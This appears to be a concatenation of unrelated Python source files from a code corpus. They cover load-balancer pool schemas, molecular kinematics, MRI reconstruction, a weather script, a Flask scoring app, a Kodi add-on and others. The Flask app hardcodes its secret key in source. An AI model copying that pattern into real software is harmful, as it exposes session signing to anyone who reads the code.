properties.Schema.LIST,
_("(Introduced in: 17.1.2) Names of external auto-scale groups for pool servers. Currently available only for AWS and Azure"),
schema=external_autoscale_groups_item_schema,
required=False,
update_allowed=True,
)
lb_algorithm_core_nonaffinity_schema = properties.Schema(
properties.Schema.NUMBER,
_("(Introduced in: 17.1.3) Degree of non-affinity for core afffinity based server selection. (Default: 2)"),
required=False,
update_allowed=True,
)
gslb_sp_enabled_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("(Introduced in: 17.2.1) Indicates if the pool is a site-persistence pool. "),
required=False,
update_allowed=False,
)
lookup_server_by_name_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("(Introduced in: 17.1.11,17.2.4) Allow server lookup by name. (Default: False)"),
required=False,
update_allowed=True,
)
description_schema = properties.Schema(
properties.Schema.STRING,
_("A description of the pool."),
required=False,
update_allowed=True,
)
cloud_uuid_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=False,
)
# properties list
PROPERTIES = (
'avi_version',
'name',
'default_server_port',
'graceful_disable_timeout',
'connection_ramp_duration',
'max_concurrent_connections_per_server',
'health_monitor_uuids',
'servers',
'server_count',
'lb_algorithm',
'lb_algorithm_hash',
'lb_algorithm_consistent_hash_hdr',
'networks',
'placement_networks',
'application_persistence_profile_uuid',
'ssl_profile_uuid',
'inline_health_monitor',
'use_service_port',
'fail_action',
'capacity_estimation',
'capacity_estimation_ttfb_thresh',
'pki_profile_uuid',
'ssl_key_and_certificate_uuid',
'server_auto_scale',
'prst_hdr_name',
'apic_epg_name',
'autoscale_networks',
'autoscale_policy_uuid',
'autoscale_launch_config_uuid',
'vrf_uuid',
'ipaddrgroup_uuid',
'fewest_tasks_feedback_delay',
'enabled',
'max_conn_rate_per_server',
'east_west',
'created_by',
'cloud_config_cksum',
'request_queue_enabled',
'request_queue_depth',
'ab_pool',
'server_reselect',
'a_pool',
'ab_priority',
'host_check_enabled',
'domain_name',
'sni_enabled',
'server_name',
'rewrite_host_header_to_sni',
'rewrite_host_header_to_server_name',
'nsx_securitygroup',
'external_autoscale_groups',
'lb_algorithm_core_nonaffinity',
'gslb_sp_enabled',
'lookup_server_by_name',
'description',
'cloud_uuid',
)
# mapping of properties to their schemas
properties_schema = {
'avi_version': avi_version_schema,
'name': name_schema,
'default_server_port': default_server_port_schema,
'graceful_disable_timeout': graceful_disable_timeout_schema,
'connection_ramp_duration': connection_ramp_duration_schema,
'max_concurrent_connections_per_server': max_concurrent_connections_per_server_schema,
'health_monitor_uuids': health_monitor_uuids_schema,
'servers': servers_schema,
'server_count': server_count_schema,
'lb_algorithm': lb_algorithm_schema,
'lb_algorithm_hash': lb_algorithm_hash_schema,
'lb_algorithm_consistent_hash_hdr': lb_algorithm_consistent_hash_hdr_schema,
'networks': networks_schema,
'placement_networks': placement_networks_schema,
'application_persistence_profile_uuid': application_persistence_profile_uuid_schema,
'ssl_profile_uuid': ssl_profile_uuid_schema,
'inline_health_monitor': inline_health_monitor_schema,
'use_service_port': use_service_port_schema,
'fail_action': fail_action_schema,
'capacity_estimation': capacity_estimation_schema,
'capacity_estimation_ttfb_thresh': capacity_estimation_ttfb_thresh_schema,
'pki_profile_uuid': pki_profile_uuid_schema,
'ssl_key_and_certificate_uuid': ssl_key_and_certificate_uuid_schema,
'server_auto_scale': server_auto_scale_schema,
'prst_hdr_name': prst_hdr_name_schema,
'apic_epg_name': apic_epg_name_schema,
'autoscale_networks': autoscale_networks_schema,
'autoscale_policy_uuid': autoscale_policy_uuid_schema,
'autoscale_launch_config_uuid': autoscale_launch_config_uuid_schema,
'vrf_uuid': vrf_uuid_schema,
'ipaddrgroup_uuid': ipaddrgroup_uuid_schema,
'fewest_tasks_feedback_delay': fewest_tasks_feedback_delay_schema,
'enabled': enabled_schema,
'max_conn_rate_per_server': max_conn_rate_per_server_schema,
'east_west': east_west_schema,
'created_by': created_by_schema,
'cloud_config_cksum': cloud_config_cksum_schema,
'request_queue_enabled': request_queue_enabled_schema,
'request_queue_depth': request_queue_depth_schema,
'ab_pool': ab_pool_schema,
'server_reselect': server_reselect_schema,
'a_pool': a_pool_schema,
'ab_priority': ab_priority_schema,
'host_check_enabled': host_check_enabled_schema,
'domain_name': domain_name_schema,
'sni_enabled': sni_enabled_schema,
'server_name': server_name_schema,
'rewrite_host_header_to_sni': rewrite_host_header_to_sni_schema,
'rewrite_host_header_to_server_name': rewrite_host_header_to_server_name_schema,
'nsx_securitygroup': nsx_securitygroup_schema,
'external_autoscale_groups': external_autoscale_groups_schema,
'lb_algorithm_core_nonaffinity': lb_algorithm_core_nonaffinity_schema,
'gslb_sp_enabled': gslb_sp_enabled_schema,
'lookup_server_by_name': lookup_server_by_name_schema,
'description': description_schema,
'cloud_uuid': cloud_uuid_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'pki_profile_uuid': 'pkiprofile',
'autoscale_policy_uuid': 'serverautoscalepolicy',
'application_persistence_profile_uuid': 'applicationpersistenceprofile',
'ipaddrgroup_uuid': 'ipaddrgroup',
'server_reselect': getattr(HTTPServerReselect, 'field_references', {}),
'ssl_key_and_certificate_uuid': 'sslkeyandcertificate',
'max_conn_rate_per_server': getattr(RateProfile, 'field_references', {}),
'placement_networks': getattr(PlacementNetwork, 'field_references', {}),
'health_monitor_uuids': 'healthmonitor',
'ssl_profile_uuid': 'sslprofile',
'autoscale_launch_config_uuid': 'autoscalelaunchconfig',
'ab_pool': getattr(AbPool, 'field_references', {}),
'fail_action': getattr(FailAction, 'field_references', {}),
'servers': getattr(Server, 'field_references', {}),
'vrf_uuid': 'vrfcontext',
'networks': getattr(NetworkFilter, 'field_references', {}),
}
unique_keys = {
'server_reselect': getattr(HTTPServerReselect, 'unique_keys', {}),
'max_conn_rate_per_server': getattr(RateProfile, 'unique_keys', {}),
'placement_networks': getattr(PlacementNetwork, 'unique_keys', {}),
'ab_pool': getattr(AbPool, 'unique_keys', {}),
'fail_action': getattr(FailAction, 'unique_keys', {}),
'servers': getattr(Server, 'unique_keys', {}),
'networks': getattr(NetworkFilter, 'unique_keys', {}),
}
class PoolServers(AviNestedResource, Server):
resource_name = "pool"
nested_property_name = "servers"
parent_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("UUID of pool."
" You can also provide a name"
" with the prefix 'get_avi_uuid_by_name:', e.g.,"
" 'get_avi_uuid_by_name:my_obj_name'."),
required=True,
update_allowed=False,
)
avi_version_schema = properties.Schema(
properties.Schema.STRING,
_("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = Server.PROPERTIES + (
'pool_uuid','avi_version')
# mapping of properties to their schemas
properties_schema = {
'avi_version': avi_version_schema,
'pool_uuid': parent_uuid_schema,
}
properties_schema.update(Server.properties_schema)
# field references
field_references = {
'pool_uuid': 'pool',
}
field_references.update(getattr(Server, 'field_references', {}))
def resource_mapping():
return {
'Avi::LBaaS::PriorityLabels': PriorityLabels,
'Avi::LBaaS::PoolGroup': PoolGroup,
'Avi::LBaaS::Pool::Server': PoolServers,
'Avi::LBaaS::PoolGroupDeploymentPolicy': PoolGroupDeploymentPolicy,
'Avi::LBaaS::Pool': Pool,
}
| 65,366 | 19,066 |
# -*- coding: UTF-8 -*-
from app.service.base_service import BaseService
from app.repository.account_title_repository import AccountTitleRepository
class AccountTitleService(BaseService):
def __init__(self):
self.__reposiroty = AccountTitleRepository()
pass
def getList(self, user_id, limit, offset):
return self.__reposiroty.findList(user_id, limit, offset)
def get(self, user_id, account_title_id):
return self.__reposiroty.find(user_id, account_title_id)
def create(self, user_id, account_title_name, account_title_classification_type):
return self.__reposiroty.insert(user_id, account_title_name, account_title_classification_type)
def update(self, account_title_id, user_id, account_title_name, account_title_classification_type):
return self.__reposiroty.update(account_title_id, user_id, account_title_name, account_title_classification_type)
def delete(self, account_title_id, user_id):
return self.__reposiroty.delete(account_title_id, user_id)
| 1,041 | 322 |
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
#
# Last modified on Mon Oct 15 15:33:49 PDT 2001 by lindy
#
# $Header: /opt/cvs/python/packages/share1.5/mglutil/math/kinematics.py,v 1.16 2007/07/24 17:30:40 vareille Exp $
#
"""kinematics.py - kinematic manipulation of chains of points
All transformations happen in the local coordinate space.
The refCoords supplied to the constructor and returned by the object
are local to the object. Clients should handle putting the points into
world coordinates (using translation, orientation, and origin).
"""
# from mglutil.math.ncoords import Ncoords
from mglutil.math.rotax import rotax
import numpy.oldnumeric as Numeric, math
class Kinematics:
rads_per_degree = Numeric.pi / 180.0
def __init__(self, allAtomsCoords, torTree, tolist=1):
"""refCoords is an nx3 list of n points
resultCoords is set up and maintained as homogeneous coords
"""
self.allAtomsCoords = allAtomsCoords
self.torTree = torTree
def __applyTorsion(self, node, parent_mtx):
"""Transform the subtree rooted at node.
The new torsion angle must be pre-set.
Children of the node are transformed recursively.
"""
# get rotation matrix for node
# my_mtx = self.rotax(node)
mtx = rotax(
Numeric.array(node.a.coords),
Numeric.array(node.b.coords),
node.angle * self.rads_per_degree,
transpose=1,
)
# node_mtx = Numeric.dot(parent_mtx, mtx)
node_mtx = self.mult4_3Mat(parent_mtx, mtx)
# set-up for the transformation
mm11 = node_mtx[0][0]
mm12 = node_mtx[0][1]
mm13 = node_mtx[0][2]
mm21 = node_mtx[1][0]
mm22 = node_mtx[1][1]
mm23 = node_mtx[1][2]
mm31 = node_mtx[2][0]
mm32 = node_mtx[2][1]
mm33 = node_mtx[2][2]
mm41 = node_mtx[3][0]
mm42 = node_mtx[3][1]
mm43 = node_mtx[3][2]
atomSet = node.atomSet
# transform the coordinates for the node
for i in node.atomRange:
x, y, z = node.coords[i][:3] # get origin-subtracted originals
c = atomSet[i].coords
c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
# recurse through children
for child in node.children:
self.__applyTorsion(child, node_mtx)
def applyAngList(self, angList, mtx):
""""""
# pre-set the torsion angles
self.torTree.setTorsionAngles(angList)
# set-up for the transformation
mm11 = mtx[0][0]
mm12 = mtx[0][1]
mm13 = mtx[0][2]
mm21 = mtx[1][0]
mm22 = mtx[1][1]
mm23 = mtx[1][2]
mm31 = mtx[2][0]
mm32 = mtx[2][1]
mm33 = mtx[2][2]
mm41 = mtx[3][0]
mm42 = mtx[3][1]
mm43 = mtx[3][2]
root = self.torTree.rootNode
atomSet = root.atomSet
# transform the coordinates for the node
for i in root.atomRange:
x, y, z = root.coords[i][:3]
c = atomSet[i].coords
c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
# traverse children of rootNode
for child in root.children:
self.__applyTorsion(child, mtx)
def mult4_3Mat(self, m1, m2):
ma11 = m1[0][0]
ma12 = m1[0][1]
ma13 = m1[0][2]
ma21 = m1[1][0]
ma22 = m1[1][1]
ma23 = m1[1][2]
ma31 = m1[2][0]
ma32 = m1[2][1]
ma33 = m1[2][2]
ma41 = m1[3][0]
ma42 = m1[3][1]
ma43 = m1[3][2]
mb11 = m2[0][0]
mb12 = m2[0][1]
mb13 = m2[0][2]
mb21 = m2[1][0]
mb22 = m2[1][1]
mb23 = m2[1][2]
mb31 = m2[2][0]
mb32 = m2[2][1]
mb33 = m2[2][2]
mb41 = m2[3][0]
mb42 = m2[3][1]
mb43 = m2[3][2]
# first line of resulting matrix
val1 = ma11 * mb11 + ma12 * mb21 + ma13 * mb31
val2 = ma11 * mb12 + ma12 * mb22 + ma13 * mb32
val3 = ma11 * mb13 + ma12 * mb23 + ma13 * mb33
result = [[val1, val2, val3, 0.0]]
# second line of resulting matrix
val1 = ma21 * mb11 + ma22 * mb21 + ma23 * mb31
val2 = ma21 * mb12 + ma22 * mb22 + ma23 * mb32
val3 = ma21 * mb13 + ma22 * mb23 + ma23 * mb33
result.append([val1, val2, val3, 0.0])
# third line of resulting matrix
val1 = ma31 * mb11 + ma32 * mb21 + ma33 * mb31
val2 = ma31 * mb12 + ma32 * mb22 + ma33 * mb32
val3 = ma31 * mb13 + ma32 * mb23 + ma33 * mb33
result.append([val1, val2, val3, 0.0])
# fourth line of resulting matrix
val1 = ma41 * mb11 + ma42 * mb21 + ma43 * mb31 + mb41
val2 = ma41 * mb12 + ma42 * mb22 + ma43 * mb32 + mb42
val3 = ma41 * mb13 + ma42 * mb23 + ma43 * mb33 + mb43
result.append([val1, val2, val3, 1.0])
return result
def rotax(self, node):
"""
Build 4x4 matrix of clockwise rotation about axis a-->b
by angle tau (radians).
a and b are numeric arrys of floats of shape (3,)
Result is a homogenous 4x4 transformation matrix.
NOTE: This has been changed by Brian, 8/30/01: rotax now returns
the rotation matrix, _not_ the transpose. This is to get
consistency across rotax, mat_to_quat and the classes in
transformation.py
"""
tau = node.angle * self.rads_per_degree
ct = math.cos(tau)
ct1 = 1.0 - ct
st = math.sin(tau)
v = node.torUnitVector
rot = Numeric.zeros((4, 4), "f")
# Compute 3x3 rotation matrix
v2 = v * v
v3 = (1.0 - v2) * ct
rot[0][0] = v2[0] + v3[0]
rot[1][1] = v2[1] + v3[1]
rot[2][2] = v2[2] + v3[2]
rot[3][3] = 1.0
v2 = v * st
rot[1][0] = v[0] * v[1] * ct1 - v2[2]
rot[2][1] = v[1] * v[2] * ct1 - v2[0]
rot[0][2] = v[2] * v[0] * ct1 - v2[1]
rot[0][1] = v[0] * v[1] * ct1 + v2[2]
rot[1][2] = v[1] * v[2] * ct1 + v2[0]
rot[2][0] = v[2] * v[0] * ct1 + v2[1]
# add translation
a = node.torBase.coords
print((" torBase (%2d) %4f, %4f, %4f:" % (node.bond[0], a[0], a[1], a[2])))
for i in (0, 1, 2):
rot[3][i] = a[i]
for j in (0, 1, 2):
rot[3][i] = rot[3][i] - rot[j][i] * a[j]
rot[i][3] = 0.0
return rot
| 6,728 | 2,823 |
import pandas as pd
import numpy as np
__all__ = ["expand_bed_regions"]
def expand_bed_regions(bed: pd.DataFrame, window_size: int, alignment: str = "center") -> pd.DataFrame:
"""Return pandas dataframe setting regions to given window size considering given alignment.
Parameters
-----------------------
bed: pd.DataFrame,
Pandas dataframe in bed-like format.
window_size: int,
Target window size.
alignment: str,
Alignment to use for generating windows.
The alignment can be either "left", "right" or "center".
Left alignemnt expands on the right, keeping the left position fixed.
Right alignemnt expands on the left, keeping the right position fixed.
Center alignemnt expands on both size equally, keeping the center position fixed.
Default is center.
Comments
-----------------------
For enhancers peaks usually one should generally use center alignment,
while when working on promoters peaks either right or left alignment
should be used depending on the strand, respectively for positive (right)
and negative (left) strand.
Raises
-----------------------
ValueError,
If given window size is non positive.
ValueError,
When given alignment is not supported.
Returns
-----------------------
Returns a pandas DataFrame in bed-like format containing the tessellated windows.
"""
if not isinstance(window_size, int) or window_size < 1:
raise ValueError("Window size must be a positive integer.")
if alignment == "left":
bed.chromEnd = bed.chromStart + window_size
elif alignment == "right":
bed.chromStart = bed.chromEnd - window_size
elif alignment == "center":
mid_point = (bed.chromEnd + bed.chromStart)//2
bed.chromStart = (mid_point - np.floor(window_size/2)).astype(int)
bed.chromEnd = (mid_point + np.ceil(window_size/2)).astype(int)
else:
raise ValueError((
"Invalid alignment parameter {alignment}. "
"Supported values are: left, right or center."
).format(alignment=alignment))
return bed
| 2,178 | 567 |
"""
Neuroimaging non-cartesian reconstruction
=========================================
Author: Chaithya G R
In this tutorial we will reconstruct an MRI image from non-cartesian kspace
measurements.
Import neuroimaging data
------------------------
We use the toy datasets available in pysap, more specifically a 2D brain slice
and the acquisition cartesian scheme.
"""
# Package import
from mri.numerics.fourier import NFFT
from mri.numerics.reconstruct import sparse_rec_fista
from mri.numerics.utils import generate_operators
from mri.numerics.utils import convert_locations_to_mask
from mri.parallel_mri.extract_sensitivity_maps import \
gridded_inverse_fourier_transform_nd
import pysap
from pysap.data import get_sample_data
# Third party import
from modopt.math.metrics import ssim
import numpy as np
# Loading input data
image = get_sample_data('2d-mri')
# Obtain MRI non-cartesian mask
radial_mask = get_sample_data("mri-radial-samples")
kspace_loc = radial_mask.data
mask = pysap.Image(data=convert_locations_to_mask(kspace_loc, image.shape))
# View Input
# image.show()
# mask.show()
#############################################################################
# Generate the kspace
# -------------------
#
# From the 2D brain slice and the acquisition mask, we retrospectively
# undersample the k-space using a radial acquisition mask
# We then reconstruct the zero order solution as a baseline
# Get the locations of the kspace samples and the associated observations
fourier_op = NFFT(samples=kspace_loc, shape=image.shape)
kspace_obs = fourier_op.op(image.data)
# Gridded solution
grid_space = np.linspace(-0.5, 0.5, num=image.shape[0])
grid2D = np.meshgrid(grid_space, grid_space)
grid_soln = gridded_inverse_fourier_transform_nd(kspace_loc, kspace_obs,
tuple(grid2D), 'linear')
image_rec0 = pysap.Image(data=grid_soln)
# image_rec0.show()
base_ssim = ssim(image_rec0, image)
print('The Base SSIM is : ' + str(base_ssim))
#############################################################################
# FISTA optimization
# ------------------
#
# We now want to refine the zero order solution using a FISTA optimization.
# The cost function is set to Proximity Cost + Gradient Cost
# Generate operators
gradient_op, linear_op, prox_op, cost_op = generate_operators(
data=kspace_obs,
wavelet_name="sym8",
samples=kspace_loc,
mu=6 * 1e-7,
nb_scales=4,
non_cartesian=True,
uniform_data_shape=image.shape,
gradient_space="synthesis")
# Start the FISTA reconstruction
max_iter = 200
x_final, costs, metrics = sparse_rec_fista(
gradient_op=gradient_op,
linear_op=linear_op,
prox_op=prox_op,
cost_op=cost_op,
lambda_init=1.0,
max_nb_of_iter=max_iter,
atol=1e-4,
verbose=1)
image_rec = pysap.Image(data=np.abs(x_final))
# image_rec.show()
recon_ssim = ssim(image_rec, image)
print('The Reconstruction SSIM is : ' + str(recon_ssim))
| 2,972 | 989 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import urllib2
import json
import decimal
import time
from apcontent import alarmpi_content
class weather_yahoo(alarmpi_content):
def build(self):
location = self.sconfig['location']
if self.sconfig['metric'] == str(1):
metric = '%20and%20u%3D\'c\''
else:
metric = ''
try:
weather_url = "https://" + \
self.sconfig["host"] + \
self.sconfig["path"] + \
location + \
metric + \
self.sconfig['pathtail']
weather_api = urllib.urlopen(weather_url)
response = weather_api.read()
response_dictionary = json.loads(response)
current = response_dictionary['query']['results']['channel']['item']['condition']['temp']
current_low = response_dictionary['query']['results']['channel']['item']['forecast'][0]['low']
current_high = response_dictionary['query']['results']['channel']['item']['forecast'][0]['high']
conditions = response_dictionary['query']['results']['channel']['item']['condition']['text']
forecast_conditions = response_dictionary['query']['results']['channel']['item']['forecast'][0]['text']
wind = response_dictionary['query']['results']['channel']['wind']['speed']
wind_chill = response_dictionary['query']['results']['channel']['wind']['chill']
sunrise = response_dictionary['query']['results']['channel']['astronomy']['sunrise']
sunset = response_dictionary['query']['results']['channel']['astronomy']['sunset']
if wind != '':
if self.debug:
print response_dictionary ['query']['results']['channel']['wind']['speed']
wind = round(float(wind),1)
# print current
# print current_low
# print current_high
# print conditions
# print wind
if conditions != forecast_conditions:
conditions = conditions + ' becoming ' + forecast_conditions
weather_yahoo = 'Weather for today is ' + str(conditions) + ' currently ' + str(current) + ' degrees with a low of ' + str(current_low) + ' and a high of ' + str(current_high) + '. '
# Wind uses the Beaufort scale
if self.sconfig['metric'] == str(1) and self.sconfig['wind'] == str(1):
if wind < 1:
gust = 'It is calm'
if wind > 1:
gust = 'With Light Air'
if wind > 5:
gust = 'With a light breeze'
if wind > 12:
gust = 'With a gentle breeze'
if wind > 20:
gust = 'With a moderate breeze'
if wind > 29:
gust = 'With a fresh breeze'
if wind > 39:
gust = 'With a strong breeze'
if wind > 50:
gust = 'With High winds at ' + wind + 'kilometres per hour'
if wind > 62:
gust = 'With Gale force winds at ' + wind + 'kilometres per hour'
if wind > 75:
gust = 'With a strong gale at ' + wind + 'kilometres per hour'
if wind > 89:
gust = 'With Storm winds at ' + wind + 'kilometres per hour'
if wind > 103:
gust = 'With Violent storm winds at ' + wind + 'kilometres per hour'
if wind > 118:
gust = 'With Hurricane force winds at ' + wind + 'kilometres per hour'
if wind == '':
gust = ''
weather_yahoo = weather_yahoo + str(gust) + '. '
if (self.sconfig['wind_chill'] == str(1) and
wind > 5 and
int(time.strftime("%m")) < 4 or
wind > 5 and
int(time.strftime("%m")) > 10):
weather_yahoo = weather_yahoo + ' And a windchill of ' + str(wind_chill) + '. '
except Exception:
weather_yahoo = 'Failed to connect to Yahoo Weather. '
if self.debug:
print weather_yahoo
self.content = weather_yahoo
| 3,996 | 1,178 |
import sys
import logging
import socket
import argparse
import json
import os
import data_model
from flask import Flask
app = Flask(__name__)
app.secret_key = 'NpaguVKgv<;f;i(:T>3tn~dsOue5Vy)'
@app.route('/degrade/<int:index>/')
def degrade_segment(index):
if index >= 97 or index < 0:
return 'bad'
else:
data_model.load_from_disk()
node = list(data_model.fence_segments.values())[index]
node.state -= 0.067
data_model.save_to_disk()
return 'done'
@app.route('/fence/<string:dinosaur>/<int:percent>/')
def exhibit_contained(dinosaur,percent):
if dinosaur not in ['velociraptor', 'tyrannosaurus', 'guaibasaurus', 'triceratops', 'all']:
return 'error'
all_exhibits = set()
fence_sections = {}
data_model.load_from_disk()
for id,node in data_model.fence_segments.items():
all_exhibits.add(node.dinosaur)
fence_sections[id] = node
number_up = 0
total_number = 0
for section in fence_sections.values():
if dinosaur == 'all' or section.dinosaur == dinosaur:
total_number += 1
if section.state >= 0.3:
number_up += 1
percent_up = int(100 * (float(number_up)/float(total_number)))
if percent_up >= percent:
return 'up'
else:
return 'down'
def main():
parser = argparse.ArgumentParser(prog='triassic_scoring.py')
parser.add_argument('-f', '--file', help="Path to the ZODB persistence file to use.")
parser.add_argument('-a', '--address', default='0.0.0.0', dest='host')
parser.add_argument('-p', '--port', default='5000', dest='port')
args = parser.parse_args()
# Initialize the database, if needed.
data_model.init_db(args.file if args.file else None)
app.run(host=args.host, port=args.port)
if __name__ == "__main__":
main()
| 1,857 | 667 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
#Submitted by thr3sh0ld
class Solution:
def solve(self,root, curr):
if root == None:
return 0
curr = curr*10 + root.val
if not root.left and not root.right:
return curr
return self.solve(root.left, curr) + self.solve(root.right, curr)
def sumNumbers(self,root: TreeNode) -> int:
return self.solve(root,0)
| 592 | 188 |
from unittest.mock import patch
import factory
from mailinglist.models import Subscriber
class SubscriberFactory(factory.DjangoModelFactory):
email = factory.Sequence(lambda n: 'foo.%d@example.com' % n)
class Meta:
model = Subscriber
@classmethod
def _create(cls, model_class, *args, **kwargs):
with patch('mailinglist.models.tasks.'
'send_confirmation_email_to_subscriber'):
return super()._create(model_class=model_class, *args, **kwargs)
| 511 | 155 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-08-01 08:22
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('wl_main', '0005_wildlifelicence_locations'),
]
operations = [
migrations.AlterField(
model_name='wildlifelicencetype',
name='code_slug',
field=models.SlugField(max_length=64, unique=True),
),
]
| 486 | 179 |
#
# Copyright (C) 2014-
# Sean Poyser (seanpoyser@gmail.com)
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with XBMC; see the file COPYING. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import xbmc
import xbmcgui
import xbmcaddon
import favourite
import utils
ADDON = utils.ADDON
ADDONID = utils.ADDONID
FRODO = utils.FRODO
PLAYMEDIA_MODE = utils.PLAYMEDIA_MODE
ACTIVATEWINDOW_MODE = utils.ACTIVATEWINDOW_MODE
RUNPLUGIN_MODE = utils.RUNPLUGIN_MODE
ACTION_MODE = utils.ACTION_MODE
SHOWPICTURE_MODE = utils.SHOWPICTURE_MODE
PLAY_PLAYLISTS = ADDON.getSetting('PLAY_PLAYLISTS') == 'true'
def getParentCommand(cmd):
parents = []
import re
try:
plugin = re.compile('plugin://(.+?)/').search(cmd.replace('?', '/')).group(1)
md5 = utils.generateMD5(plugin)
if md5 not in parents:
return None
if xbmc.getCondVisibility('System.HasAddon(%s)' % plugin) == 1:
return 'plugin://%s' % plugin
except Exception, e:
pass
return None
def processParentCommand(cmd):
parent = getParentCommand(cmd)
if not parent:
return
xbmc.executebuiltin('Container.Update(%s)' % parent)
while not xbmc.getInfoLabel('Container.FolderPath').startswith(parent):
xbmc.sleep(50)
def playCommand(originalCmd, contentMode=False):
try:
xbmc.executebuiltin('Dialog.Close(busydialog)') #Isengard fix
cmd = favourite.tidy(originalCmd)
if cmd.lower().startswith('executebuiltin'):
cmd = cmd.replace('"', '')
cmd = cmd.lower()
cmd = cmd.replace('"', '')
cmd = cmd.replace('executebuiltin(', '')
if cmd.endswith('))'):
cmd = cmd[:-1]
if cmd.endswith(')') and '(' not in cmd:
cmd = cmd[:-1]
#if a 'Super Favourite' favourite just do it
#if ADDONID in cmd:
# return xbmc.executebuiltin(cmd)
#if in contentMode just do it
if contentMode:
xbmc.executebuiltin('ActivateWindow(Home)') #some items don't play nicely if launched from wrong window
if cmd.lower().startswith('activatewindow'):
cmd = cmd.replace('")', '",return)') #just in case return is missing
return xbmc.executebuiltin(cmd)
if cmd.startswith('RunScript'):
#workaround bug in Frodo that can cause lock-up
#when running a script favourite
if FRODO:
xbmc.executebuiltin('ActivateWindow(Home)')
if PLAY_PLAYLISTS:
import playlist
if playlist.isPlaylist(cmd):
return playlist.play(cmd)
if 'ActivateWindow' in cmd:
return activateWindowCommand(cmd)
if 'PlayMedia' in cmd:
return playMedia(originalCmd)
xbmc.executebuiltin(cmd)
except Exception, e:
utils.log('Error in playCommand')
utils.log('Command: %s' % cmd)
utils.log('Error: %s' % str(e))
def activateWindowCommand(cmd):
cmds = cmd.split(',', 1)
#special case for filemanager
if '10003' in cmds[0] or 'filemanager' in cmds[0].lower():
xbmc.executebuiltin(cmd)
return
plugin = None
activate = None
if len(cmds) == 1:
activate = cmds[0]
else:
activate = cmds[0]+',return)'
plugin = cmds[1][:-1]
#check if it is a different window and if so activate it
id = str(xbmcgui.getCurrentWindowId())
if id not in activate:
xbmc.executebuiltin(activate)
if plugin:
#processParentCommand(plugin)
xbmc.executebuiltin('Container.Update(%s)' % plugin)
def playMedia(original):
import re
cmd = favourite.tidy(original) #.replace(',', '') #remove spurious commas
processParentCommand(cmd)
try: mode = int(favourite.getOption(original, 'mode'))
except: mode = 0
if mode == PLAYMEDIA_MODE:
xbmc.executebuiltin(cmd)
return
plugin = re.compile('"(.+?)"').search(cmd).group(1)
if mode == SHOWPICTURE_MODE:
xbmc.executebuiltin('ShowPicture(%s)' % plugin)
return
if len(plugin) < 1:
xbmc.executebuiltin(cmd)
return
if mode == ACTIVATEWINDOW_MODE:
try: winID = int(favourite.getOption(original, 'winID'))
except: winID = 10025
#check if it is a different window and if so activate it
id = xbmcgui.getCurrentWindowId()
if id != winID :
xbmc.executebuiltin('ActivateWindow(%d)' % winID)
cmd = 'Container.Update(%s)' % plugin
xbmc.executebuiltin(cmd)
return
if mode == RUNPLUGIN_MODE:
cmd = 'RunPlugin(%s)' % plugin
xbmc.executebuiltin(cmd)
return
#if all else fails just execute it
xbmc.executebuiltin(cmd)
| 5,565 | 1,895 |